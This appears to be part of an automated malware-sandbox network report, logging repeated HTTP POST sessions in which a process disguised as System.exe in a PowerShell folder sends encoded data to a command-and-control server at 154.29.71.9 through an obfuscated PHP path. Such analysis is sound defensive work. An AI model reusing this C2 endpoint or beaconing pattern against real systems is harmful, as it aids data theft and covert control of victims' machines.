                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 11 32 07 3d 0d 32 04 30 50 2e 3c 3d 52 3f 09 36 40 2c 5b 3b 00 3f 5c 3b 19 2c 0d 23 1d 3e 16 08 42 3e 22 23 53 32 2f 02 13 3c 1c 20 51 03 12 24 00 32 39 26 10 2a 1d 0c 07 2e 3e 0e 40 22 0f 3c 05 27 3a 22 11 21 13 22 05 24 3f 00 09 2a 01 3d 1c 2e 58 30 06 2d 23 02 1d 3f 15 23 55 0b 1f 26 0b 30 0f 20 57 32 2b 24 11 3c 23 27 06 2b 2a 0e 0f 21 29 3b 02 25 00 35 01 24 57 3d 55 24 08 2e 04 26 23 25 5e 21 07 2f 5c 25 2a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"2=20P.<=R?6@,[;?\;,#>B>"#S2/< Q$29&*.>@"<':"!"$?*=.X0-#?#U&0 W2+$<#'+*!);%5$W=U$.&#%^!/\%*.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    103192.168.2.450052154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:37.317040920 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:37.676373959 CET2600OUTData Raw: 59 58 5d 58 5e 58 58 54 5b 59 5a 55 50 59 5b 5a 56 55 54 47 52 5c 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YX]X^XXT[YZUPY[ZVUTGR\R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/%(:*.((7W$;0;#.6;V"(=T). &#8]-"Y ']/
                                                                                                    Jan 4, 2025 14:53:37.833810091 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:37.962261915 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    104192.168.2.450058154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:38.142982960 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:38.488826036 CET2600OUTData Raw: 5c 5b 58 5e 5b 5f 58 55 5b 59 5a 55 50 51 5b 57 56 53 54 47 52 58 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[X^[_XU[YZUPQ[WVSTGRXR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z.>!X%8=*-3([4%8 ^8:56(")X$@$3 \:"Y ']/
                                                                                                    Jan 4, 2025 14:53:38.688193083 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:38.823826075 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    105192.168.2.450064154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:38.982894897 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:39.332539082 CET2600OUTData Raw: 59 51 58 51 5e 59 58 55 5b 59 5a 55 50 5a 5b 50 56 51 54 47 52 5f 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YQXQ^YXU[YZUPZ[PVQTGR_R^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;%>V)+T%(;;31!'!8V)423 ."Y ']/,
                                                                                                    Jan 4, 2025 14:53:39.506455898 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:39.638025999 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    106192.168.2.450070154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:39.798650026 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:40.145097971 CET2600OUTData Raw: 59 5b 58 5a 5e 5c 58 54 5b 59 5a 55 50 59 5b 5a 56 52 54 45 52 58 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y[XZ^\XT[YZUPY[ZVRTERXR[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_8*2^")(^+ '//168!()$B&#(\."Y ']/
                                                                                                    Jan 4, 2025 14:53:40.326376915 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:40.456005096 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    107192.168.2.450076154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:40.588589907 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:40.941941977 CET2600OUTData Raw: 59 5d 5d 5b 5b 5f 5d 51 5b 59 5a 55 50 59 5b 5b 56 53 54 41 52 50 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y]][[_]Q[YZUPY[[VSTARPR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/=_2^9)'+7U0+ _;#2!W"+)Q*>$C$#(."Y ']/
                                                                                                    Jan 4, 2025 14:53:41.125070095 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:41.257956982 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    108192.168.2.450078154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:41.533159971 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2592
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:41.879441023 CET2592OUTData Raw: 59 59 5d 5c 5b 5d 58 5d 5b 59 5a 55 50 58 5b 53 56 55 54 48 52 59 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YY]\[]X][YZUPX[SVUTHRYR]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\98>%_18?>(+=%(<; 2!-P";9(.;1 :"Y ']/
                                                                                                    Jan 4, 2025 14:53:42.046262026 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:42.174917936 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    109192.168.2.450084154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:42.362409115 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:42.708184004 CET2600OUTData Raw: 5c 5b 58 5f 5b 55 58 52 5b 59 5a 55 50 51 5b 53 56 56 54 48 52 5c 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[X_[UXR[YZUPQ[SVVTHR\RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/.22?>8Z?=';#/ "".<#8)P=- C%3(Y/?"Y ']/
                                                                                                    Jan 4, 2025 14:53:42.879360914 CET1236OUTData Raw: 02 07 53 1a 34 31 37 2d 3f 29 5b 27 3f 0c 3e 2c 38 20 27 50 3c 3b 01 3a 3c 56 27 2e 37 3a 20 29 0f 03 1a 1f 3f 5b 35 30 24 55 41 14 08 1f 22 26 3b 57 59 5c 35 01 09 5d 0d 3e 29 50 34 30 29 24 07 57 3b 23 26 01 24 15 04 29 31 25 3f 04 1f 0e 04 06
                                                                                                    Data Ascii: S417-?)['?>,8 'P<;:<V'.7: )?[50$UA"&;WY\5]>)P40)$W;#&$)1%?2-9Y;;/^99;["#^(!Y"0<818936)?"0/;".)</2]1]=$ D="#5?;[1_,8(9^%\!?.?!73=7?82S#!2<-=[?:60X(!52![.-#:93:
                                                                                                    Jan 4, 2025 14:53:43.379405022 CET1236OUTData Raw: 5c 5b 58 5f 5b 55 58 52 5b 59 5a 55 50 51 5b 53 56 56 54 48 52 5c 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[X_[UXR[YZUPQ[SVVTHR\RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/.22?>8Z?=';#/ "".<#8)P=- C%3(Y/?"Y ']/
                                                                                                    Jan 4, 2025 14:53:43.492743969 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:43.492861032 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:43.493050098 CET25INHTTP/1.1 100 Continue


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    110192.168.2.450087154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:43.495663881 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:43.848431110 CET1856OUTData Raw: 5c 5a 58 5b 5b 5c 58 54 5b 59 5a 55 50 5b 5b 51 56 57 54 44 52 58 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZX[[\XT[YZUP[[QVWTDRXRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8%Y19*_(-(%(,,02V">,5^")-;23(X."Y ']/(
                                                                                                    Jan 4, 2025 14:53:44.030515909 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:44.161690950 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 5b 31 39 31 0e 25 2e 2c 1d 2d 2f 3d 52 28 09 3e 44 3b 03 23 02 3c 2a 02 07 2f 0a 3f 59 29 3b 2e 41 29 0f 37 53 32 3f 2c 5b 28 26 20 51 03 12 27 11 24 29 2a 5b 3e 33 2e 06 2d 00 30 0b 35 08 38 04 25 14 26 5a 22 13 04 04 25 11 36 09 3e 3c 26 0f 2d 00 02 02 3a 30 2c 53 3f 3f 23 55 0b 1f 26 0b 25 31 1d 0f 26 28 16 10 28 33 37 06 3f 14 27 1d 34 04 2c 11 31 2d 29 06 27 08 36 0d 30 32 3a 07 30 33 08 06 22 07 2c 00 32 2a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"[191%.,-/=R(>D;#<*/?Y);.A)7S2?,[(& Q'$)*[>3.-058%&Z"%6><&-:0,S??#U&%1&((37?'4,1-)'602:03",2*.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    111192.168.2.450088154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:43.495697021 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:43.848431110 CET2596OUTData Raw: 5c 5b 5d 5a 5e 59 5d 53 5b 59 5a 55 50 58 5b 52 56 5d 54 45 52 59 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[]Z^Y]S[YZUPX[RV]TERYRYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;5[$;2W?=$Z+= $8,.39![,6(*> D%,Z:?"Y ']/
                                                                                                    Jan 4, 2025 14:53:44.022209883 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:44.152064085 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    112192.168.2.450092154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:44.449529886 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:44.801306009 CET2600OUTData Raw: 59 58 5d 5a 5b 58 5d 53 5b 59 5a 55 50 5e 5b 55 56 5c 54 41 52 5e 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YX]Z[X]S[YZUP^[UV\TAR^RXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z,%2.>=()>/W',0"U!;!())4&3 Z9"Y ']/<
                                                                                                    Jan 4, 2025 14:53:44.977145910 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:45.107897997 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    113192.168.2.450103154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:45.257313013 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:45.613831043 CET2600OUTData Raw: 59 50 5d 58 5e 5f 58 5c 5b 59 5a 55 50 59 5b 52 56 56 54 49 52 5c 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YP]X^_X\[YZUPY[RVVTIR\RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[8:18:?-_<./T$]?8 .;Q5;)W).?%U8\9"Y ']/
                                                                                                    Jan 4, 2025 14:53:45.793041945 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:45.925911903 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    114192.168.2.450109154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
